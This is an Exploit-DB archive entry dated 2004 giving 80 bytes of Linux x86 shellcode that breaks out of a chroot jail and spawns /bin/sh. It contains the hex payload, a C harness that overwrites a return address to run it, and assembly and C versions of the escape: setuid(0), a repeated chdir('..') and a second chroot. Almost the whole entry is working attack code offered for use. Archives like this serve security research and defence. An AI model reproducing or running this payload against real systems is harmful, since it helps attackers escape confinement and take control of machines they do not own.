Linux/x86 - Break chroot + execve(/bin/sh) Shellcode (80 bytes)

EDB-ID:

13454

CVE:

N/A




Platform:

Linux_x86

Date:

2004-09-12


/* This is Linux chroot()/execve() code.It is 80 bytes long.I have some    *
 * ideas how to make it smaller, but till then use this one.               *
 *                                         signed predator                 *
 *                                         linux registered user : 181116  *
 *                                         preedator(at)sendmail(dot)ru    *
 ***************************************************************************/

char sc[]="\x31\xc0\x31\xdb\x31\xc9\xb0\x17\xcd\x80\xeb\x36\x5e\x88\x46\x0a"
          "\x8d\x5e\x05\xb1\xed\xb0\x27\xcd\x80\x31\xc0\xb0\x3d\xcd\x80\x83"
          "\xc3\x02\xb0\x0c\xcd\x80\xe0\xfa\xb0\x3d\xcd\x80\x89\x76\x08\x31"
          "\xc0\x88\x46\x07\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x89\xc2\xb0\x0b"
          "\xcd\x80\xe8\xc5\xff\xff\xff/bin/sh..";

int main(){
  int *ret=(int *)(&ret+2);
  printf("len : %d\n",strlen(sc));
  *ret=(int)sc;
}


// Asm code
/*********************************************
 *int main(){                                *
 * __asm__(" xorl %eax,%eax           \n"    *
 *	   " xorl %ebx,%ebx           \n"    *
 *         " xorl %ecx,%ecx           \n"    *
 *	   " movb $0x17,%al           \n"    *
 *	   " int  $0x80               \n"    *
 *         " jmp 0x36                 \n"    *
 *         " popl %esi                \n"    *
 *	   " movb %al,0xa(%esi)       \n"    *
 *         " leal 0x5(%esi),%ebx      \n"    *
 *	   " movb $0xed,%cl           \n"    *
 *	   " movb $0x27,%al           \n"    *
 *	   " int $0x80                \n"    *
 *         " xorl %eax,%eax           \n"    *
 *         " movb $0x3d,%al           \n"    *
 *	   " int $0x80                \n"    * 
 *	   " addl $0x2,%ebx           \n"    *
 *         " movb $0xc,%al            \n"    *
 *	   " int $0x80                \n"    *
 *         " loopne -0x06             \n"    *
 *         " movb $0x3d,%al           \n"    *
 *	   " int $0x80                \n"    *
 *	   " movl %esi,0x8(%esi)      \n"    * 
 *         " xorl %eax,%eax           \n"    * 
 *         " movb %al,0x7(%esi)       \n"    *
 *         " movl %eax,0xc(%esi)      \n"    *
 *         " movl %esi,%ebx           \n"    *
 *         " leal 0x8(%esi),%ecx      \n"    *
 *         " movl %eax,%edx           \n"    *
 *         " movb $0xb,%al            \n"    *
 *         " int $0x80                \n"    *
 *         " call -0x3b               \n"    *
 *         " .string \"/bin/sh..\"    \n");  *
 *}                                          *
 *********************************************/ 

//C code
/**********************************************
*int main(){                                  *
*  char *sh[2]={"/bin/sh",NULL};              *
*  int gg=0xed                                *
*  mkdir("sh..",gg);			      *
*  chroot("sh..");			      *
*  while (gg!=0){                             *
*     chdir("..");gg--;                       *
*  }                                          *
* chroot("..");                               *
* execve(sh[0],sh,NULL);                      *
*}                                            *
***********************************************/

// milw0rm.com [2004-09-12]